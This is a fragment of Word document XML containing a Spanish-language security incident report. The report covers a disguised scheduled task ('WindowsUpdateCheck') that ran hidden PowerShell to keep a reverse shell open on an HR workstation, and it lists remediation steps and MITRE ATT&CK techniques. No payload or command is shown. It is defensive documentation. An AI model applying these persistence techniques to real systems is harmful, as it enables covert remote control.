      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:before="12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Vector: Tarea programada maliciosa (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WindowsUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) creada en la PC de un empleado de RR.HH. a las 6 AM, ejecutando un script de PowerShell oculto (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-WindowStyle Hidden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) cada 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">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Impacto: Reverse shell activo en PowerShell, dando al atacante control remoto y ejecución de comandos sobre el equipo. La ejecución periódica (cada 30 minutos) garantizaba persistencia del acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:before="18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Remediación aplicada:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aislamiento del equipo de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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Decodificación del script en Base64 para confirmar el objetivo del atacante antes de actuar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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Eliminación de la tarea programada maliciosa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinstalación/verificación de integridad del sistema por posible malware adicional.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:befor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Framework de referencia: MITRE ATT&amp;CK — T1053.005 (Scheduled Task/Job), T1059.001 (PowerShell), T1071 (Application Layer Protocol / C2).</w:t>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0b0b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